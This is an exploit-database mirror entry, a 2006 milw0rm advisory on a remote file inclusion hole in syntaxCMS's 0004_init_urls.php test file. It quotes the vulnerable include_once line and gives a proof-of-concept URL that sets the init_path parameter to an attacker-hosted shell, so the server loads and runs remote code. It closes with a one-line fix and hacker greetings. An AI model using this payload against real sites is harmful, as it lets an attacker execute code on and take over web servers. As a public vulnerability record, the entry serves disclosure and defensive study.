exploit-db-mirror/exploits/php/webapps/2424.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
415 B
Text

Remote File Include in syntaxCMS
Vulnerable File:
0004_init_urls.php
Vulnerable Code:
1 <?php
2 include_once( $init_path . '/init.urls.php' );
3 ?>
PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&
Solution:
Remove This File...it's not needed...just used for tests
Found by MoHaJaLi
Greetz to Eddy_BAck0o
# milw0rm.com [2006-09-24]